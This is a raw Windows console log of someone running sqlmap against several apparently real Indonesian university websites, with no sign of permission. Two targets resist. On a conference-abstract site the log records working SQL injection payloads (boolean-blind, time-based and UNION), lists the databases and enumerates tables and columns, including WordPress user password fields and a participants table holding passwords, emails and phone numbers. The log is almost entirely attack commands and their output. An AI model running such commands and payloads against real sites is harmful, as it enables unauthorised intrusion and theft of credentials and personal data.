Microsoft Windows [Version 10.0.

14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>cd..
C:\Windows>cd..
C:\>python27/sqlmap/sqlmap.py -u http://www.aknsumenep.ac.id/pp.php?id=28 --batc
h --dbs
'python27' is not recognized as an internal or external command,
operable program or batch file.
C:\>Python27/sqlmap/sqlmap.py -u http://www.aknsumenep.ac.id/pp.php?id=28 --batc
h --dbs
'Python27' is not recognized as an internal or external command,
operable program or batch file.
C:\>Python27/sqlmap/sqlmap.py -u http://www.aknsumenep.ac.id/pp.php?id=28 --batc
h --dbs
'Python27' is not recognized as an internal or external command,
operable program or batch file.
C:\>Python27\sqlmap\sqlmap.py -u http://www.aknsumenep.ac.id/pp.php?id=28 --batc
h --dbs
___
__H__
___ ___[(]_____ ___ ___ {1.0.12.14#dev}
|_ -| . ['] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 01:44:23
[01:44:23] [INFO] testing connection to the target URL
[01:44:24] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
S
[01:44:24] [INFO] testing if the target URL is stable
[01:44:24] [INFO] target URL is stable
[01:44:24] [INFO] testing if GET parameter 'id' is dynamic
[01:44:25] [WARNING] GET parameter 'id' does not appear to be dynamic
[01:44:25] [WARNING] heuristic (basic) test shows that GET parameter 'id' might
not be injectable
[01:44:25] [INFO] testing for SQL injection on GET parameter 'id'
[01:44:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:44:25] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[01:44:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (FLOOR)'
[01:44:26] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:44:26] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause (IN)'
[01:44:26] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[01:44:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[01:44:26] [INFO] testing 'MySQL inline queries'
[01:44:26] [INFO] testing 'PostgreSQL inline queries'
[01:44:26] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[01:44:26] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[01:44:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)
'
[01:44:27] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - c
omment)'
[01:44:27] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[01:44:27] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:44:27] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[01:44:28] [INFO] testing 'Oracle AND time-based blind'
[01:44:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:44:28] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it with option '--dbms'
[01:44:31] [WARNING] GET parameter 'id' does not seem to be injectable
[01:44:31] [CRITICAL] all tested parameters appear to be not injectable. Try to
increase '--level'/'--risk' values to perform more tests. Also, you can try to r
erun by providing either a valid value for option '--string' (or '--regexp'). If
you suspect that there is some kind of protection mechanism involved (e.g. WAF)
maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
[*] shutting down at 01:44:31

C:\>Python27\sqlmap\sqlmap.py -u https://pmb.usd.ac.id/index.php?id=30&mn=4 --ba

tch --dbs
___
__H__
___ ___[(]_____ ___ ___ {1.0.12.14#dev}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 01:44:55
[01:44:55] [INFO] testing connection to the target URL
[01:44:56] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
S
[01:44:57] [INFO] testing if the target URL is stable
[01:44:57] [INFO] target URL is stable
[01:44:57] [INFO] testing if GET parameter 'id' is dynamic
[01:44:58] [INFO] confirming that GET parameter 'id' is dynamic
[01:44:58] [INFO] GET parameter 'id' is dynamic
[01:44:59] [ERROR] possible integer casting detected (e.g. "$id=intval($_REQUEST
['id'])") at the back-end web application
do you want to skip those kind of cases (and save scanning time)? [y/N] n
[01:45:05] [INFO] testing for SQL injection on GET parameter 'id'
[01:45:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:45:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[01:45:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (FLOOR)'
[01:45:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:45:14] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause (IN)'
[01:45:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[01:45:18] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[01:45:18] [INFO] testing 'MySQL inline queries'
[01:45:18] [INFO] testing 'PostgreSQL inline queries'
[01:45:19] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[01:45:19] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[01:45:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)
'
[01:45:22] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - c
omment)'
[01:45:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[01:45:25] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:45:27] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[01:45:29] [INFO] testing 'Oracle AND time-based blind'
[01:45:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:45:31] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it with option '--dbms'
[01:45:59] [WARNING] GET parameter 'id' does not seem to be injectable
[01:45:59] [CRITICAL] all tested parameters appear to be not injectable. Try to
increase '--level'/'--risk' values to perform more tests. Also, you can try to r
erun by providing either a valid value for option '--string' (or '--regexp'). If
you suspect that there is some kind of protection mechanism involved (e.g. WAF)
maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
[*] shutting down at 01:45:59
'mn' is not recognized as an internal or external command,
operable program or batch file.
C:\>Python27\sqlmap\sqlmap.py -u https://pmb.usd.ac.id/index.php?id=30&mn=4 --ba
tch --dbms
___
__H__
___ ___["]_____ ___ ___ {1.0.12.14#dev}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 01:46:11
[01:46:11] [INFO] testing connection to the target URL
[01:46:12] [INFO] testing if the target URL is stable
[01:46:13] [INFO] target URL is stable
[01:46:13] [INFO] testing if GET parameter 'id' is dynamic
[01:46:13] [INFO] confirming that GET parameter 'id' is dynamic
[01:46:13] [INFO] GET parameter 'id' is dynamic
[01:46:14] [ERROR] possible integer casting detected (e.g. "$id=intval($_REQUEST
['id'])") at the back-end web application
do you want to skip those kind of cases (and save scanning time)? [y/N] n
[01:46:21] [INFO] testing for SQL injection on GET parameter 'id'
[01:46:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:46:27] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[01:46:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (FLOOR)'
[01:46:30] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:46:31] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause (IN)'
[01:46:33] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[01:46:35] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[01:46:35] [INFO] testing 'MySQL inline queries'
[01:46:36] [INFO] testing 'PostgreSQL inline queries'
[01:46:36] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[01:46:37] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[01:46:38] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)
'
[01:46:40] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - c
omment)'
[01:46:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[01:46:45] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:46:47] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[01:46:49] [INFO] testing 'Oracle AND time-based blind'
[01:46:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:46:51] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it with option '--dbms'
[01:47:15] [WARNING] GET parameter 'id' does not seem to be injectable
[01:47:15] [CRITICAL] all tested parameters appear to be not injectable. Try to
increase '--level'/'--risk' values to perform more tests. Also, you can try to r
erun by providing either a valid value for option '--string' (or '--regexp'). If
you suspect that there is some kind of protection mechanism involved (e.g. WAF)
maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
[*] shutting down at 01:47:15
'mn' is not recognized as an internal or external command,
operable program or batch file.
C:\>Python27\sqlmap\sqlmap.py -u https://pmb.usd.ac.id/index.php?id=30 --batch -
-dbms
___
__H__
___ ___[.]_____ ___ ___ {1.0.12.14#dev}
|_ -| . ["] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
Usage: sqlmap.py [options]
sqlmap.py: error: --dbms option requires an argument
Press Enter to continue...
C:\>Python27\sqlmap\sqlmap.py -u https://pmb.usd.ac.id/index.php?id=30 --batch -
-dbs
___
__H__
___ ___[,]_____ ___ ___ {1.0.12.14#dev}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 01:47:32
[01:47:33] [INFO] testing connection to the target URL
[01:47:33] [INFO] testing if the target URL is stable
[01:47:34] [INFO] target URL is stable
[01:47:34] [INFO] testing if GET parameter 'id' is dynamic
[01:47:34] [INFO] confirming that GET parameter 'id' is dynamic
[01:47:34] [INFO] GET parameter 'id' is dynamic
[01:47:35] [ERROR] possible integer casting detected (e.g. "$id=intval($_REQUEST
['id'])") at the back-end web application
do you want to skip those kind of cases (and save scanning time)? [y/N] N
[01:47:36] [INFO] testing for SQL injection on GET parameter 'id'
[01:47:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:47:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[01:47:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (FLOOR)'
[01:47:42] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:47:44] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause (IN)'
[01:47:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[01:47:47] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[01:47:47] [INFO] testing 'MySQL inline queries'
[01:47:48] [INFO] testing 'PostgreSQL inline queries'
[01:47:48] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[01:47:48] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[01:47:49] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)
'
[01:47:51] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - c
omment)'
[01:47:52] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[01:47:54] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:47:58] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[01:48:00] [INFO] testing 'Oracle AND time-based blind'
[01:48:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:48:02] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it with option '--dbms'
[01:48:24] [WARNING] GET parameter 'id' does not seem to be injectable
[01:48:24] [CRITICAL] all tested parameters appear to be not injectable. Try to
increase '--level'/'--risk' values to perform more tests. Also, you can try to r
erun by providing either a valid value for option '--string' (or '--regexp'). If
you suspect that there is some kind of protection mechanism involved (e.g. WAF)
maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
[*] shutting down at 01:48:24

C:\>Python27\sqlmap\sqlmap.py -u http://elite.event.uinjkt.ac.id/acs/pages/abstr
act.php?id=78 --batch --dbs
___
__H__
___ ___[(]_____ ___ ___ {1.0.12.14#dev}
|_ -| . [)] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 09:42:03
[09:42:04] [INFO] testing connection to the target URL
[09:42:05] [INFO] heuristics detected web page charset 'ISO-8859-2'
[09:42:05] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
S
[09:42:05] [INFO] testing if the target URL is stable
[09:42:05] [INFO] target URL is stable
[09:42:05] [INFO] testing if GET parameter 'id' is dynamic
[09:42:06] [INFO] confirming that GET parameter 'id' is dynamic
[09:42:06] [INFO] GET parameter 'id' is dynamic
[09:42:06] [INFO] heuristics detected web page charset 'ascii'
[09:42:06] [WARNING] heuristic (basic) test shows that GET parameter 'id' might
not be injectable
[09:42:06] [INFO] testing for SQL injection on GET parameter 'id'
[09:42:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:42:08] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WH
ERE or HAVING clause' injectable (with --string="OF")
[09:42:10] [INFO] heuristic (extended) test shows that the back-end DBMS could b
e 'MySQL'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads sp
ecific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending
provided level (1) and risk (1) values? [Y/n] Y
[09:42:10] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (BIGINT UNSIGNED)'
[09:42:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (B
IGINT UNSIGNED)'
[09:42:10] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (EXP)'
[09:42:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (E
XP)'
[09:42:10] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER
BY or GROUP BY clause (JSON_KEYS)'
[09:42:11] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE, HAVING clause
(JSON_KEYS)'
[09:42:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (FLOOR)'
[09:42:11] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (FLOOR)'
[09:42:11] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (EXTRACTVALUE)'
[09:42:11] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (EXTRACTVALUE)'
[09:42:11] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (UPDATEXML)'
[09:42:11] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (UPDATEXML)'
[09:42:11] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (FLOOR)'
[09:42:11] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause (F
LOOR)'
[09:42:12] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)
'
[09:42:12] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACT
VALUE)'
[09:42:12] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT
UNSIGNED)'
[09:42:12] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[09:42:12] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_
KEYS)'
[09:42:12] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[09:42:12] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
ML)'
[09:42:12] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
VALUE)'
[09:42:12] [INFO] testing 'MySQL inline queries'
[09:42:12] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[09:42:12] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[09:42:12] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment
)'
[09:42:13] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[09:42:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment
)'
[09:42:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:42:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[09:42:23] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-bas
ed blind' injectable
[09:42:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:42:23] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[09:42:24] [INFO] 'ORDER BY' technique appears to be usable. This should reduce
the time needed to find the right number of query columns. Automatically extendi
ng the range for current UNION query injection technique test
[09:42:25] [INFO] target URL appears to have 18 columns in query
[09:42:30] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 co
lumns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] N
sqlmap identified the following injection point(s) with a total of 94 HTTP(s) re
quests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=78' AND 1350=1350 AND 'nfbT'='nfbT
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=78' AND SLEEP(5) AND 'FSHp'='FSHp
Type: UNION query
Title: Generic UNION query (NULL) - 18 columns
Payload: id=-4733' UNION ALL SELECT CONCAT(0x7178767671,0x474470787245636c45
51664c765a556476556f6568617062506f66676d674751726e574a53507155,0x71716b6b71),NUL
L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL
L-- tIAT
---
[09:42:31] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
[09:42:31] [INFO] fetching database names
[09:42:31] [INFO] the SQL query used returns 2 entries
[09:42:32] [INFO] retrieved: information_schema
[09:42:32] [INFO] retrieved: elite
available databases [2]:
[*] elite
[*] information_schema
[09:42:32] [INFO] fetched data logged to text files under 'C:\Users\SRS\.sqlmap\
output\elite.event.uinjkt.ac.id'
[*] shutting down at 09:42:32

C:\>Python27\sqlmap\sqlmap.py -u http://elite.event.uinjkt.ac.id/acs/pages/abstr
act.php?id=78 -D elite --batch --columns
___
__H__
___ ___[(]_____ ___ ___ {1.0.12.14#dev}
|_ -| . [.] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 09:43:06
[09:43:07] [INFO] resuming back-end DBMS 'mysql'
[09:43:07] [INFO] testing connection to the target URL
[09:43:07] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=78' AND 1350=1350 AND 'nfbT'='nfbT
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=78' AND SLEEP(5) AND 'FSHp'='FSHp
Type: UNION query
Title: Generic UNION query (NULL) - 18 columns
Payload: id=-4733' UNION ALL SELECT CONCAT(0x7178767671,0x474470787245636c45
51664c765a556476556f6568617062506f66676d674751726e574a53507155,0x71716b6b71),NUL
L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL
L-- tIAT
---
[09:43:07] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
[09:43:07] [INFO] fetching tables for database: 'elite'
[09:43:08] [INFO] the SQL query used returns 20 entries
[09:43:08] [INFO] retrieved: tbl_abstract
[09:43:09] [INFO] retrieved: tbl_files
[09:43:09] [INFO] retrieved: tbl_paper_reviewer
[09:43:10] [INFO] retrieved: tbl_participants
[09:43:10] [INFO] retrieved: tbl_reviewer
[09:43:11] [INFO] retrieved: tbl_system
[09:43:12] [INFO] retrieved: tbl_topic
[09:43:12] [INFO] retrieved: tbl_visitors
[09:43:12] [INFO] retrieved: wp_commentmeta
[09:43:13] [INFO] retrieved: wp_comments
[09:43:14] [INFO] retrieved: wp_links
[09:43:14] [INFO] retrieved: wp_options
[09:43:14] [INFO] retrieved: wp_postmeta
[09:43:15] [INFO] retrieved: wp_posts
[09:43:16] [INFO] retrieved: wp_term_relationships
[09:43:16] [INFO] retrieved: wp_term_taxonomy
[09:43:17] [INFO] retrieved: wp_termmeta
[09:43:17] [INFO] retrieved: wp_terms
[09:43:18] [INFO] retrieved: wp_usermeta
[09:43:18] [INFO] retrieved: wp_users
[09:43:18] [INFO] fetching columns for table 'tbl_abstract' in database 'elite'
[09:43:19] [INFO] the SQL query used returns 18 entries
[09:43:19] [INFO] retrieved: "id","int(10)"
[09:43:20] [INFO] retrieved: "uid","varchar(255)"
[09:43:20] [INFO] retrieved: "date","varchar(255)"
[09:43:21] [INFO] retrieved: "time","varchar(255)"
[09:43:21] [INFO] retrieved: "ip","varchar(255)"
[09:43:22] [INFO] retrieved: "hostname","varchar(255)"
[09:43:22] [INFO] retrieved: "uid_owner","varchar(255)"
[09:43:23] [INFO] retrieved: "title","text"
[09:43:23] [INFO] retrieved: "authors","text"
[09:43:24] [INFO] retrieved: "institutions","text"
[09:43:24] [INFO] retrieved: "content","text"
[09:43:25] [INFO] retrieved: "keywords","varchar(255)"
[09:43:25] [INFO] retrieved: "topic","varchar(255)"
[09:43:26] [INFO] retrieved: "last_update","varchar(255)"
[09:43:26] [INFO] retrieved: "accepted","varchar(1)"
[09:43:27] [INFO] retrieved: "payment","varchar(255)"
[09:43:27] [INFO] retrieved: "code1","varchar(255)"
[09:43:28] [INFO] retrieved: "presenter","varchar(255)"
[09:43:28] [INFO] fetching columns for table 'wp_links' in database 'elite'
[09:43:28] [INFO] the SQL query used returns 13 entries
[09:43:29] [INFO] retrieved: "link_id","bigint(20) unsigned"
[09:43:29] [INFO] retrieved: "link_url","varchar(255)"
[09:43:30] [INFO] retrieved: "link_name","varchar(255)"
[09:43:30] [INFO] retrieved: "link_image","varchar(255)"
[09:43:31] [INFO] retrieved: "link_target","varchar(25)"
[09:43:31] [INFO] retrieved: "link_description","varchar(255)"
[09:43:32] [INFO] retrieved: "link_visible","varchar(20)"
[09:43:32] [INFO] retrieved: "link_owner","bigint(20) unsigned"
[09:43:33] [INFO] retrieved: "link_rating","int(11)"
[09:43:33] [INFO] retrieved: "link_updated","datetime"
[09:43:34] [INFO] retrieved: "link_rel","varchar(255)"
[09:43:34] [INFO] retrieved: "link_notes","mediumtext"
[09:43:35] [INFO] retrieved: "link_rss","varchar(255)"
[09:43:35] [INFO] fetching columns for table 'wp_term_taxonomy' in database 'eli
te'
[09:43:35] [INFO] the SQL query used returns 6 entries
[09:43:36] [INFO] retrieved: "term_taxonomy_id","bigint(20) unsigned"
[09:43:36] [INFO] retrieved: "term_id","bigint(20) unsigned"
[09:43:37] [INFO] retrieved: "taxonomy","varchar(32)"
[09:43:37] [INFO] retrieved: "description","longtext"
[09:43:38] [INFO] retrieved: "parent","bigint(20) unsigned"
[09:43:38] [INFO] retrieved: "count","bigint(20)"
[09:43:39] [INFO] fetching columns for table 'wp_postmeta' in database 'elite'
[09:43:39] [INFO] the SQL query used returns 4 entries
[09:43:40] [INFO] retrieved: "meta_id","bigint(20) unsigned"
[09:43:40] [INFO] retrieved: "post_id","bigint(20) unsigned"
[09:43:41] [INFO] retrieved: "meta_key","varchar(255)"
[09:43:41] [INFO] retrieved: "meta_value","longtext"
[09:43:41] [INFO] fetching columns for table 'tbl_paper_reviewer' in database 'e
lite'
[09:43:41] [INFO] the SQL query used returns 6 entries
[09:43:42] [INFO] retrieved: "id","int(255)"
[09:43:42] [INFO] retrieved: "uid","varchar(255)"
[09:43:43] [INFO] retrieved: "paper_uid","varchar(255)"
[09:43:43] [INFO] retrieved: "reviewer_uid","varchar(255)"
[09:43:44] [INFO] retrieved: "review","text"
[09:43:44] [INFO] retrieved: "reviewer_name","varchar(255)"
[09:43:44] [INFO] fetching columns for table 'wp_users' in database 'elite'
[09:43:45] [INFO] the SQL query used returns 10 entries
[09:43:45] [INFO] retrieved: "ID","bigint(20) unsigned"
[09:43:46] [INFO] retrieved: "user_login","varchar(60)"
[09:43:46] [INFO] retrieved: "user_pass","varchar(255)"
[09:43:47] [INFO] retrieved: "user_nicename","varchar(50)"
[09:43:47] [INFO] retrieved: "user_email","varchar(100)"
[09:43:48] [INFO] retrieved: "user_url","varchar(100)"
[09:43:48] [INFO] retrieved: "user_registered","datetime"
[09:43:49] [INFO] retrieved: "user_activation_key","varchar(255)"
[09:43:49] [INFO] retrieved: "user_status","int(11)"
[09:43:50] [INFO] retrieved: "display_name","varchar(250)"
[09:43:50] [INFO] fetching columns for table 'wp_terms' in database 'elite'
[09:43:50] [INFO] the SQL query used returns 4 entries
[09:43:50] [INFO] retrieved: "term_id","bigint(20) unsigned"
[09:43:51] [INFO] retrieved: "name","varchar(200)"
[09:43:51] [INFO] retrieved: "slug","varchar(200)"
[09:43:52] [INFO] retrieved: "term_group","bigint(10)"
[09:43:52] [INFO] fetching columns for table 'wp_usermeta' in database 'elite'
[09:43:52] [INFO] the SQL query used returns 4 entries
[09:43:52] [INFO] retrieved: "umeta_id","bigint(20) unsigned"
[09:43:53] [INFO] retrieved: "user_id","bigint(20) unsigned"
[09:43:53] [INFO] retrieved: "meta_key","varchar(255)"
[09:43:53] [INFO] retrieved: "meta_value","longtext"
[09:43:53] [INFO] fetching columns for table 'tbl_participants' in database 'eli
te'
[09:43:54] [INFO] the SQL query used returns 26 entries
[09:43:54] [INFO] retrieved: "id","int(255)"
[09:43:54] [INFO] retrieved: "uid","varchar(255)"
[09:43:54] [INFO] retrieved: "userid","varchar(255)"
[09:43:55] [INFO] retrieved: "password2","varchar(255)"
[09:43:55] [INFO] retrieved: "date","varchar(255)"
[09:43:55] [INFO] retrieved: "time","varchar(255)"
[09:43:55] [INFO] retrieved: "ip","varchar(255)"
[09:43:55] [INFO] retrieved: "hostname","varchar(255)"
[09:43:56] [INFO] retrieved: "name1","varchar(255)"
[09:43:56] [INFO] retrieved: "name2","varchar(255)"
[09:43:57] [INFO] retrieved: "name3","varchar(255)"
[09:43:57] [INFO] retrieved: "title","varchar(255)"
[09:43:58] [INFO] retrieved: "institution","text"
[09:43:58] [INFO] retrieved: "street","varchar(255)"
[09:43:59] [INFO] retrieved: "city","varchar(255)"
[09:43:59] [INFO] retrieved: "zipcode","varchar(255)"
[09:44:00] [INFO] retrieved: "country","varchar(255)"
[09:44:00] [INFO] retrieved: "phone","varchar(255)"
[09:44:01] [INFO] retrieved: "fax","varchar(255)"
[09:44:01] [INFO] retrieved: "email","varchar(255)"
[09:44:02] [INFO] retrieved: "registered","varchar(255)"
[09:44:02] [INFO] retrieved: "fee","varchar(255)"
[09:44:03] [INFO] retrieved: "info","text"
[09:44:03] [INFO] retrieved: "from_internal","varchar(255)"
[09:44:04] [INFO] retrieved: "is_presenter","varchar(255)"
[09:44:04] [INFO] retrieved: "procbook","varchar(255)"
[09:44:04] [INFO] fetching columns for table 'wp_options' in database 'elite'
[09:44:05] [INFO] the SQL query used returns 4 entries
[09:44:05] [INFO] retrieved: "option_id","bigint(20) unsigned"
[09:44:06] [INFO] retrieved: "option_name","varchar(191)"
[09:44:06] [INFO] retrieved: "option_value","longtext"
[09:44:07] [INFO] retrieved: "autoload","varchar(20)"
